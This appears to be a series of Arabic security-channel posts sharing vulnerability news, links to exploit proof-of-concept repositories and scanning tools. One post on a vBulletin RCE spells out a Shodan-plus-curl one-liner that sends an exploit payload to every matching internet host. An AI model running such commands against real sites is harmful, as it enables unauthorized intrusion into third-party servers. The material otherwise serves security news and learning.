سوالف سايبر فقرة رمضانية بتقديم محمد الدوسري وعبدالرحمن بمواضيع مختلفة

موضوعنا اليوم: اختراق حسابات التواصل الاجتماعي

#فعاليات_رمضان1 #سوالف_سايبر

شرح طرق اختراق حسابات التواصل الاجتماعي والحسابات بشكل عام من الأخ محمد الدوسري والأخ عبد الرحمن

متابعة باقي فقرات #سوالف_سايبر وباقي فعاليات رمضان على الغروب
@sec_and_hack

مقال يشرح مبدأ عمل المصادقة الثنائية
2-Factor Authentication

وبعض الاستراتيجيات لتخطيها

https://t.co/rObGIJy2iA

⚠️ تقنية جديدة تمكن من التخمين على حسابات المستخدمين في نظام ويندوز ..

بالاعتماد على LogonUserW API يمكن لأي مستخدم حتى لو كان guest ان يخمن على بيانات تسجيل الدخول لحسابات المستخدمين الآخرين من داخل الحساب .. في حين أن ذلك غير ممكن من صفحة تسجيل الدخول الاعتيادية بسبب قفل الحساب عند تجربة عدة كلمات سر خاطئة ، بينما باستخدام هذه التقنية ليس هناك أي قيود على عدد المحاولات

تم نشر تطبيق إثبات PoC على github :

https://github.com/DarkCoderSc/win-brute-logon

⚠️ ثغرة أمنية جديدة في تقنية البلوتوث تسمح بعمل spoof لأحد الأجهزة المتصلة .. والتظاهر بأن جهاز المستهدف هو أحد أجهزة الطرفين
مليارات الأجهزة تم تحديدها كمصابة

https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html

#bluetooth #spoof

⚠️ هجمات APT مصدرها إيران تستهدف جهات حكومية وبنى تحتية تابعة للكويت والمملكة العربية السعودية

https://thehackernews.com/2020/05/iran-hackers-kuwait.html

#APT

‏سكربت لاستغلال ثغرات قاعدة بيانات Firebase

https://github.com/nullr3x/ExpoFire

هذا الكتاب يعد دليلا مثاليا لكل من يريد البدء بتعلم واتقان سطر أوامر لينكس
الكتاب من تأليف:William E. Shotts Jr.

عدد صفحات الكتاب:480.
اللغة: الانجليزية

⚠️ SMBleed
ثغرة أمنية حديثة في بروتوكول SMBv3 لنظام ويندوز من اكتشاف الفريق الأمني ZecOps

CVE-2020-1206
تسمح بتسريب محتوى ذاكرة الكيرنال عن بعد Remotely

وعند ربطها مع ثغرة SMBGhost ( CVE-2020-0796 ) السابقة يمكن تنفيذ أوامر خارجية على النظام RCE

كود الاستغلال ( ربط الثغرتين RCE ) :

https://github.com/ZecOps/CVE-2020-0796-RCE-POC


كود استغلال آخر

https://github.com/chompie1337/SMBGhost_RCE_PoC


#smb #smbleed #smbghost
#windows #RCE #wormable #POC

فيديو إثبات POC تم فيه استغلال الثغرتين السابقتين وإتمام RCE وفتح اتصال عكسي على نظام ويندوز 10

كود الاستغلال من github

A2SV
~~~~

Auto Scanning to SSL Vulnerability

اداة تقوم بفحص عدة ثغرات في SSL

ثغرات مثل :

HeartBleed ، CCS Injection ، SSLv3 POODLE ، FREAK attacks ... etc.

-

AndroBugs
~~~~~~~~
اداة تقوم بتحليل تطبيقات الاندرويد (apk) للعثور على ثغرات امنية فيها

يساعد مطورين التطبيقات او الهكر في اكتشاف الثغرات

المميزات :
- بحث عن الثغرات في تطبيق Android
- التحقق من برمجة التطبيق اذا تفتقد لشيء معين
- التحقق من اوامر shell الخطيرة مثل su
- جمع معلومات من ملايين التطبيقات
- تحقق من الحماية الامنية للتطبيق

الرابط من github :
https://github.com/AndroBugs/AndroBugs_Framework

-

طريقة جميلة للهندسة الاجتماعية صح؟ 😂

⚠️ اكتشاف عدة ثغرات أمنية ببروتوكول GTP الخاص بشبكة المحمول والانترنت
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS

التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html

⚙https://github.com/future-architect/vuls

اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.


#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma

⚠️ اكتشاف ثغرة أمنية جديدة في GRUB2 bootloader
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )

التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html


#grub #persistence #vulnerability #bypass #secure_boot

📂 كورسات متنوعة بحجم 36 غيغابايت ( أمن معلومات - شبكات - برمجة ...... )
منوعة بين فيديوهات وكتب

* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw

#courses #security #networking #programming
#project_sigma

rpcbind pentesting / enumeration [ port 111 ]

مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..

https://book.hacktricks.xyz/pentesting/pentesting-rpcbind

#rpcbind #enumeration #port_111
#project_sigma

⚠️ vbulletin 0-day RCE

ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام

- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html

- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; 

#vbulletin #RCE #webapp #poc #exploit #0day
#project_sigma

▫️ DirtyCOW

ثغرة [ قديمة ] في كيرنال نظام لينكس linux kernel
( privilege escalation )

Race Condition COW ( copy-on-write )

فيديو رائع يشرح مبدأ الثغرة بالتفصيل

https://www.youtube.com/watch?v=kEsshExn7aE

* الاستغلال موجود على exploit-db بعدة إصدارات *


#root #privilege_escalation #DirtyCOW #race_condition
#project_sigma